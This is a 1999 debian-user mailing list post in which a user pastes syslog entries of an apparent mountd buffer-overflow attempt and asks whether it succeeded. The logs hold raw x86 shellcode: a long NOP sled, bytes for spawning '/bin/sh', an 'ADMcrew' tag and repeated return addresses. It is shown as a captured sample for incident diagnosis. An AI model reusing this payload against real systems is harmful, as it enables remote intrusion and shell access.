Possible NFS/mountd compromise?

To: debian-user@lists.debian.org, linux-user@egr.msu.edu
Subject: Possible NFS/mountd compromise?
From: pfaffben@pilot.msu.edu (Ben Pfaff)
Date: Sun, 31 Jan 1999 20:41:15 -0500 (EST)
Message-id: <[🔎] m1078MV-000R6YC@pfaffben.user.msu.edu>
Reply-to: pfaffben@pilot.msu.edu

[CC:'s are appreciated; I am not subscribed to debian-user.  Thanks!]

I got the followed logged in my /var/log/syslog today.  It looks to me
like a buffer overflow attack of some kind (character ? is `no
operation' in x86 assembly language).  Does anyone know of a
vulnerability in mountd to this sort of thing?

I think that the attack failed since it says `Blocked attempt' at
least on the second one.  Is there a reliable way to tell whether the
attempt succeeded?

I am running the latest potato as of yesterday, so everything on the
system is the latest version.

Thanks,

Ben

Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????3Û3À°^[Í?3Ò3À?Ú°^FÍ0Þ¢1uô1À°^BÍ?,T@(Bubëb^V¬<ýt^FþÀt^Këõ°0þÈ?Fÿëì^°^B?^FþÈ?F^D°^F?F^H°f1ÛþÃ(IqÍ??(B^F°^Bf?F^L°*f?F^N?F^L?F^D1À?F^P°^P?F^H°fþÃÍ0?1^A?F^D°f³^DÍ0Ë1^DëLëR1À?F^D?F^H°fþÃÍ?,HC°(B?1ÉÍ0?1?þÁÍ0?1?þÁÍ0?1.bin@?^F¸.sh!@?F^D1À?F^G?v^H?F^L°^K(Is?(BN^H?V^LÍ?1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
Jan 31 18:26:41 pfaffben ^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H attempted from 129.247.106.135 
Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????3Û3À°^[Í?3Ò3À?Ú°^FÍ0Þ¢1uô1À°^BÍ?,T@(Bubëb^V¬<ýt^FþÀt^Këõ°0þÈ?Fÿëì^°^B?^FþÈ?F^D°^F?F^H°f1ÛþÃ(IqÍ??(B^F°^Bf?F^L°*f?F^N?F^L?F^D1À?F^P°^P?F^H°fþÃÍ0?1^A?F^D°f³^DÍ0Ë1^DëLëR1À?F^D?F^H°fþÃÍ?,HC°(B?1ÉÍ0?1?þÁÍ0?1?þÁÍ0?1.bin@?^F¸.sh!@?F^D1À?F^G?v^H?F^L°^K(Is?(BN^H?V^LÍ?1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
Jan 31 18:26:41 pfaffben -^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H 
Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to mount ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????3Û3À°^[Í?3Ò3À?Ú°^FÍ0Þ¢1uô1À°^BÍ?,T@(Bubëb^V¬<ýt^FþÀt^Këõ°0þÈ?Fÿëì^°^B?^FþÈ?F^D°^F?F^H°f1ÛþÃ(IqÍ??(B^F°^Bf?F^L°*f?F^N?F^L?F^D1À?F^P°^P?F^H°fþÃÍ0?1^A?F^D°f³^DÍ0Ë1^DëLëR1À?F^D?F^H°fþÃÍ?,HC°(B?1ÉÍ0?1?þÁÍ0?1?þÁÍ0?1.bin@?^F¸.sh!@?F^D1À?F^G?v^H?F^L°^K(Is?(BN^H?V^LÍ?
Jan 31 18:26:41 pfaffben 1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H 
Jan 31 18:26:47 pfaffben tcplogd: port 10752 connection attempt from trabbi.ia.kp.dlr.de [129.247.106.135]

-- 
"MONO - Monochrome Emulation
 This field is used to store your favorite bit."
--FreeVGA Attribute Controller Reference

Reply to:

Follow-Ups:
- Re: Possible NFS/mountd compromise?
  - From: Joey Hess <joey@kitenet.net>

Prev by Date: using dpgk
Next by Date: Re: Browser for a slow computer?
Previous by thread: Re: using dpgk
Next by thread: Re: Possible NFS/mountd compromise?
Index(es):
- Date
- Thread